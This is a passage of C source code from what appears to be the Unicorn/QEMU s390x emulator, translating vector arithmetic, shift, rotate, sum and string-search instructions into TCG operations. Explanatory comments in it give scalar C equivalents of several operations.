tcg_temp_free(tcg_ctx, t2); } static void gen_malh_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, TCGv_i32 c) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t0, a); tcg_gen_extu_i32_i64(tcg_ctx, t1, b); tcg_gen_extu_i32_i64(tcg_ctx, t2, c); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_add_i64(tcg_ctx, t0, t0, t2); tcg_gen_extrh_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static DisasJumpType op_vma(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); static const GVecGen4 g_vmal[3] = { { .fno = gen_helper_gvec_vmal8, }, { .fno = gen_helper_gvec_vmal16, }, { .fni4 = gen_mal_i32, }, }; static const GVecGen4 g_vmah[3] = { { .fno = gen_helper_gvec_vmah8, }, { .fno = gen_helper_gvec_vmah16, }, { .fni4 = gen_mah_i32, }, }; static const GVecGen4 g_vmalh[3] = { { .fno = gen_helper_gvec_vmalh8, }, { .fno = gen_helper_gvec_vmalh16, }, { .fni4 = gen_malh_i32, }, }; static const GVecGen4 g_vmae[3] = { { .fno = gen_helper_gvec_vmae8, }, { .fno = gen_helper_gvec_vmae16, }, { .fno = gen_helper_gvec_vmae32, }, }; static const GVecGen4 g_vmale[3] = { { .fno = gen_helper_gvec_vmale8, }, { .fno = gen_helper_gvec_vmale16, }, { .fno = gen_helper_gvec_vmale32, }, }; static const GVecGen4 g_vmao[3] = { { .fno = gen_helper_gvec_vmao8, }, { .fno = gen_helper_gvec_vmao16, }, { .fno = gen_helper_gvec_vmao32, }, }; static const GVecGen4 g_vmalo[3] = { { .fno = gen_helper_gvec_vmalo8, }, { .fno = gen_helper_gvec_vmalo16, }, { .fno = gen_helper_gvec_vmalo32, }, }; const GVecGen4 *fn; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xaa: fn = &g_vmal[es]; break; case 0xab: fn = &g_vmah[es]; break; case 0xa9: fn = &g_vmalh[es]; break; case 0xae: fn = &g_vmae[es]; break; case 0xac: fn = &g_vmale[es]; break; case 0xaf: fn = &g_vmao[es]; break; case 0xad: fn = &g_vmalo[es]; break; default: g_assert_not_reached(); } gen_gvec_4(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), fn); return DISAS_NEXT; } static void gen_mh_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_muls2_i32(tcg_ctx, t, d, a, b); tcg_temp_free_i32(tcg_ctx, t); } static void gen_mlh_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); 
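/*
 * VMH/VMLH keep only the high half of the 32 x 32 product;
 * tcg_gen_muls2/mulu2 produce both halves at once and the low half is
 * simply discarded. Scalar equivalents of the two helpers:
 *
 *   static int32_t mulh_s32(int32_t a, int32_t b)
 *   {
 *       return (int32_t)(((int64_t)a * b) >> 32);   // signed high half
 *   }
 *   static uint32_t mulh_u32(uint32_t a, uint32_t b)
 *   {
 *       return (uint32_t)(((uint64_t)a * b) >> 32); // unsigned high half
 *   }
 */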
tcg_gen_mulu2_i32(tcg_ctx, t, d, a, b); tcg_temp_free_i32(tcg_ctx, t); } static DisasJumpType op_vm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g_vmh[3] = { { .fno = gen_helper_gvec_vmh8, }, { .fno = gen_helper_gvec_vmh16, }, { .fni4 = gen_mh_i32, }, }; static const GVecGen3 g_vmlh[3] = { { .fno = gen_helper_gvec_vmlh8, }, { .fno = gen_helper_gvec_vmlh16, }, { .fni4 = gen_mlh_i32, }, }; static const GVecGen3 g_vme[3] = { { .fno = gen_helper_gvec_vme8, }, { .fno = gen_helper_gvec_vme16, }, { .fno = gen_helper_gvec_vme32, }, }; static const GVecGen3 g_vmle[3] = { { .fno = gen_helper_gvec_vmle8, }, { .fno = gen_helper_gvec_vmle16, }, { .fno = gen_helper_gvec_vmle32, }, }; static const GVecGen3 g_vmo[3] = { { .fno = gen_helper_gvec_vmo8, }, { .fno = gen_helper_gvec_vmo16, }, { .fno = gen_helper_gvec_vmo32, }, }; static const GVecGen3 g_vmlo[3] = { { .fno = gen_helper_gvec_vmlo8, }, { .fno = gen_helper_gvec_vmlo16, }, { .fno = gen_helper_gvec_vmlo32, }, }; const GVecGen3 *fn; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xa2: gen_gvec_fn_3(tcg_ctx, mul, es, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; case 0xa3: fn = &g_vmh[es]; break; case 0xa1: fn = &g_vmlh[es]; break; case 0xa6: fn = &g_vme[es]; break; case 0xa4: fn = &g_vmle[es]; break; case 0xa7: fn = &g_vmo[es]; break; case 0xa5: fn = &g_vmlo[es]; break; default: g_assert_not_reached(); } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), fn); return DISAS_NEXT; } static DisasJumpType op_vnn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, nand, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vno(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, nor, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vnx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, eqv, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vo(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, or, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_voc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, orc, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vpopct(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); static const GVecGen2 g[4] = { { .fno = gen_helper_gvec_vpopct8, }, { .fno = gen_helper_gvec_vpopct16, }, { .fni4 = tcg_gen_ctpop_i32, }, { .fni8 = tcg_gen_ctpop_i64, }, }; if (es > ES_64 || (es != ES_8 && !s390_has_feat(s->uc, S390_FEAT_VECTOR_ENH))) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2(tcg_ctx, get_field(s, v1), get_field(s, v2), &g[es]); return DISAS_NEXT; } static void gen_rll_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, b, 31); tcg_gen_rotl_i32(tcg_ctx, d, a, t0); tcg_temp_free_i32(tcg_ctx, t0); } static void gen_rll_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { 
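/*
 * Element rotate counts are taken modulo the element width, hence the
 * "& 63" below (and "& 31" in the i32 variant above). A scalar sketch
 * that also avoids undefined shifts for a zero count:
 *
 *   static uint64_t rotl64(uint64_t x, unsigned n)
 *   {
 *       n &= 63;
 *       return (x << n) | (x >> (-n & 63)); // (-0 & 63) == 0, no UB
 *   }
 */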
TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, b, 63); tcg_gen_rotl_i64(tcg_ctx, d, a, t0); tcg_temp_free_i64(tcg_ctx, t0); } static DisasJumpType op_verllv(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_verllv8, }, { .fno = gen_helper_gvec_verllv16, }, { .fni4 = gen_rll_i32, }, { .fni8 = gen_rll_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static DisasJumpType op_verll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen2s g[4] = { { .fno = gen_helper_gvec_verll8, }, { .fno = gen_helper_gvec_verll16, }, { .fni4 = gen_rll_i32, }, { .fni8 = gen_rll_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2s(tcg_ctx, get_field(s, v1), get_field(s, v3), o->addr1, &g[es]); return DISAS_NEXT; } static void gen_rim_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, int32_t c) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_rotli_i32(tcg_ctx, t, a, c & 31); tcg_gen_and_i32(tcg_ctx, t, t, b); tcg_gen_andc_i32(tcg_ctx, d, d, b); tcg_gen_or_i32(tcg_ctx, d, d, t); tcg_temp_free_i32(tcg_ctx, t); } static void gen_rim_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, int64_t c) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_rotli_i64(tcg_ctx, t, a, c & 63); tcg_gen_and_i64(tcg_ctx, t, t, b); tcg_gen_andc_i64(tcg_ctx, d, d, b); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static DisasJumpType op_verim(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); const uint8_t i4 = get_field(s, i4) & (NUM_VEC_ELEMENT_BITS(es) - 1); static const GVecGen3i g[4] = { { .fno = gen_helper_gvec_verim8, }, { .fno = gen_helper_gvec_verim16, }, { .fni4 = gen_rim_i32, .load_dest = true, }, { .fni8 = gen_rim_i64, .load_dest = true, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3i(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), i4, &g[es]); return DISAS_NEXT; } static DisasJumpType op_vesv(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0x70: gen_gvec_fn_3(tcg_ctx, shlv, es, v1, v2, v3); break; case 0x7a: gen_gvec_fn_3(tcg_ctx, sarv, es, v1, v2, v3); break; case 0x78: gen_gvec_fn_3(tcg_ctx, shrv, es, v1, v2, v3); break; default: g_assert_not_reached(); } return DISAS_NEXT; } static DisasJumpType op_ves(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t d2 = get_field(s, d2) & (NUM_VEC_ELEMENT_BITS(es) - 1); const uint8_t v1 = get_field(s, v1); const uint8_t v3 = get_field(s, v3); TCGv_i32 shift; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (likely(!get_field(s, b2))) { switch (s->fields.op2) { case 0x30: gen_gvec_fn_2i(tcg_ctx, shli, es, v1, v3, d2); break; case 0x3a: gen_gvec_fn_2i(tcg_ctx, sari, es, v1, v3, d2); break; case 0x38: 
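/*
 * 0x38 is VESRL (shift right logical); 0x30/0x3a above are VESL/VESRA.
 * The gen_rim_i64() helper earlier implements VERIM's
 * rotate-then-insert-under-mask, whose scalar shape is:
 *
 *   static uint64_t rim64(uint64_t d, uint64_t a, uint64_t m, unsigned rot)
 *   {
 *       uint64_t t = (a << (rot & 63)) | (a >> (-rot & 63)); // rotate a
 *       return (d & ~m) | (t & m); // keep d outside the mask, t inside
 *   }
 */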
gen_gvec_fn_2i(tcg_ctx, shri, es, v1, v3, d2); break; default: g_assert_not_reached(); } } else { shift = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, shift, o->addr1); tcg_gen_andi_i32(tcg_ctx, shift, shift, NUM_VEC_ELEMENT_BITS(es) - 1); switch (s->fields.op2) { case 0x30: gen_gvec_fn_2s(tcg_ctx, shls, es, v1, v3, shift); break; case 0x3a: gen_gvec_fn_2s(tcg_ctx, sars, es, v1, v3, shift); break; case 0x38: gen_gvec_fn_2s(tcg_ctx, shrs, es, v1, v3, shift); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, shift); } return DISAS_NEXT; } static DisasJumpType op_vsl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 shift = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, shift, get_field(s, v3), 7, ES_8); if (s->fields.op2 == 0x74) { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x7); } else { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x78); } gen_gvec_2i_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), shift, 0, gen_helper_gvec_vsl); tcg_temp_free_i64(tcg_ctx, shift); return DISAS_NEXT; } static DisasJumpType op_vsldb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t i4 = get_field(s, i4) & 0xf; const int left_shift = (i4 & 7) * 8; const int right_shift = 64 - left_shift; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); if ((i4 & 8) == 0) { read_vec_element_i64(tcg_ctx, t0, get_field(s, v2), 0, ES_64); read_vec_element_i64(tcg_ctx, t1, get_field(s, v2), 1, ES_64); read_vec_element_i64(tcg_ctx, t2, get_field(s, v3), 0, ES_64); } else { read_vec_element_i64(tcg_ctx, t0, get_field(s, v2), 1, ES_64); read_vec_element_i64(tcg_ctx, t1, get_field(s, v3), 0, ES_64); read_vec_element_i64(tcg_ctx, t2, get_field(s, v3), 1, ES_64); } tcg_gen_extract2_i64(tcg_ctx, t0, t1, t0, right_shift); tcg_gen_extract2_i64(tcg_ctx, t1, t2, t1, right_shift); write_vec_element_i64(tcg_ctx, t0, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, t1, get_field(s, v1), 1, ES_64); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); return DISAS_NEXT; } static DisasJumpType op_vsra(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 shift = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, shift, get_field(s, v3), 7, ES_8); if (s->fields.op2 == 0x7e) { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x7); } else { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x78); } gen_gvec_2i_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), shift, 0, gen_helper_gvec_vsra); tcg_temp_free_i64(tcg_ctx, shift); return DISAS_NEXT; } static DisasJumpType op_vsrl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 shift = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, shift, get_field(s, v3), 7, ES_8); if (s->fields.op2 == 0x7c) { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x7); } else { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x78); } gen_gvec_2i_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), shift, 0, gen_helper_gvec_vsrl); tcg_temp_free_i64(tcg_ctx, shift); return DISAS_NEXT; } static DisasJumpType op_vs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, tcg_gen_sub2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_fn_3(tcg_ctx, sub, es, 
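/*
 * For ES_128 the subtraction was handled above as one 128-bit operation
 * split over two host words (tcg_gen_sub2_i64); smaller element sizes
 * fall through to the plain gvec subtract. Scalar shape of the
 * two-word subtract with borrow propagation:
 *
 *   uint64_t dl = al - bl;
 *   uint64_t dh = ah - bh - (al < bl); // borrow out of the low half
 */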
get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static void gen_scbi_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, d, a, b); } static void gen_scbi_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GEU, d, a, b); } static void gen_scbi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_sub2_i64(tcg_ctx, tl, th, al, zero, bl, zero); tcg_gen_andi_i64(tcg_ctx, th, th, 1); tcg_gen_sub2_i64(tcg_ctx, tl, th, ah, zero, th, zero); tcg_gen_sub2_i64(tcg_ctx, tl, th, tl, th, bh, zero); /* "invert" the result: -1 -> 0; 0 -> 1 */ tcg_gen_addi_i64(tcg_ctx, dl, th, 1); tcg_gen_mov_i64(tcg_ctx, dh, zero); tcg_temp_free_i64(tcg_ctx, th); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vscbi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vscbi8, }, { .fno = gen_helper_gvec_vscbi16, }, { .fni4 = gen_scbi_i32, }, { .fni8 = gen_scbi_i64, }, }; if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, gen_scbi2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static void gen_sbi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, tl, bl); tcg_gen_not_i64(tcg_ctx, th, bh); gen_ac2_i64(tcg_ctx, dl, dh, al, ah, tl, th, cl, ch); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); } static DisasJumpType op_vsbi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_sbi2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static void gen_sbcbi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, tl, bl); tcg_gen_not_i64(tcg_ctx, th, bh); gen_accc2_i64(tcg_ctx, dl, dh, al, ah, tl, th, cl, ch); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); } static DisasJumpType op_vsbcbi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_sbcbi2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static DisasJumpType op_vsumg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_i64 sum, tmp; uint8_t dst_idx; if (es == ES_8 || es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } sum = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); for (dst_idx = 0; dst_idx < 
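/*
 * A note on the borrow helpers above: VSCBI's "borrow indication" is 1
 * when no borrow occurs and 0 otherwise, i.e. the inverse of a
 * conventional borrow flag:
 *
 *   static uint64_t scbi64(uint64_t a, uint64_t b)
 *   {
 *       return a >= b; // matches the TCG_COND_GEU setcond
 *   }
 *
 * gen_sbi2_i64() likewise subtracts by adding the complement, using
 * a - b - borrow == a + ~b + carry in two's complement.
 */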
2; dst_idx++) { uint8_t idx = dst_idx * NUM_VEC_ELEMENTS(es) / 2; const uint8_t max_idx = idx + NUM_VEC_ELEMENTS(es) / 2 - 1; read_vec_element_i64(tcg_ctx, sum, get_field(s, v3), max_idx, es); for (; idx <= max_idx; idx++) { read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), idx, es); tcg_gen_add_i64(tcg_ctx, sum, sum, tmp); } write_vec_element_i64(tcg_ctx, sum, get_field(s, v1), dst_idx, ES_64); } tcg_temp_free_i64(tcg_ctx, sum); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vsumq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t max_idx = NUM_VEC_ELEMENTS(es) - 1; TCGv_i64 sumh, suml, zero, tmpl; uint8_t idx; if (es < ES_32 || es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } sumh = tcg_const_i64(tcg_ctx, 0); suml = tcg_temp_new_i64(tcg_ctx); zero = tcg_const_i64(tcg_ctx, 0); tmpl = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, suml, get_field(s, v3), max_idx, es); for (idx = 0; idx <= max_idx; idx++) { read_vec_element_i64(tcg_ctx, tmpl, get_field(s, v2), idx, es); tcg_gen_add2_i64(tcg_ctx, suml, sumh, suml, sumh, tmpl, zero); } write_vec_element_i64(tcg_ctx, sumh, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, suml, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, sumh); tcg_temp_free_i64(tcg_ctx, suml); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, tmpl); return DISAS_NEXT; } static DisasJumpType op_vsum(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_i32 sum, tmp; uint8_t dst_idx; if (es > ES_16) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } sum = tcg_temp_new_i32(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); for (dst_idx = 0; dst_idx < 4; dst_idx++) { uint8_t idx = dst_idx * NUM_VEC_ELEMENTS(es) / 4; const uint8_t max_idx = idx + NUM_VEC_ELEMENTS(es) / 4 - 1; read_vec_element_i32(tcg_ctx, sum, get_field(s, v3), max_idx, es); for (; idx <= max_idx; idx++) { read_vec_element_i32(tcg_ctx, tmp, get_field(s, v2), idx, es); tcg_gen_add_i32(tcg_ctx, sum, sum, tmp); } write_vec_element_i32(tcg_ctx, sum, get_field(s, v1), dst_idx, ES_32); } tcg_temp_free_i32(tcg_ctx, sum); tcg_temp_free_i32(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vtm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, gen_helper_gvec_vtm); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_vfae(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_3 * const g[3] = { gen_helper_gvec_vfae8, gen_helper_gvec_vfae16, gen_helper_gvec_vfae32, }; static gen_helper_gvec_3_ptr * const g_cc[3] = { gen_helper_gvec_vfae_cc8, gen_helper_gvec_vfae_cc16, gen_helper_gvec_vfae_cc32, }; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, m5, g_cc[es]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), m5, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vfee(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static 
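/*
 * VFEE (find element equal) uses the same dispatch pattern as VFAE just
 * above: bit 0 of the m5 field selects a condition-code-setting helper
 * variant. Sketch of the decode:
 *
 *   static bool m5_sets_cc(uint8_t m5)
 *   {
 *       return (m5 & 1) != 0; // same as extract32(m5, 0, 1)
 *   }
 */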
gen_helper_gvec_3 * const g[3] = { gen_helper_gvec_vfee8, gen_helper_gvec_vfee16, gen_helper_gvec_vfee32, }; static gen_helper_gvec_3_ptr * const g_cc[3] = { gen_helper_gvec_vfee_cc8, gen_helper_gvec_vfee_cc16, gen_helper_gvec_vfee_cc32, }; if (es > ES_32 || m5 & ~0x3) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, m5, g_cc[es]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), m5, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vfene(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_3 * const g[3] = { gen_helper_gvec_vfene8, gen_helper_gvec_vfene16, gen_helper_gvec_vfene32, }; static gen_helper_gvec_3_ptr * const g_cc[3] = { gen_helper_gvec_vfene_cc8, gen_helper_gvec_vfene_cc16, gen_helper_gvec_vfene_cc32, }; if (es > ES_32 || m5 & ~0x3) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, m5, g_cc[es]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), m5, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vistr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_2 * const g[3] = { gen_helper_gvec_vistr8, gen_helper_gvec_vistr16, gen_helper_gvec_vistr32, }; static gen_helper_gvec_2_ptr * const g_cc[3] = { gen_helper_gvec_vistr_cc8, gen_helper_gvec_vistr_cc16, gen_helper_gvec_vistr_cc32, }; if (es > ES_32 || m5 & ~0x1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, g_cc[es]); 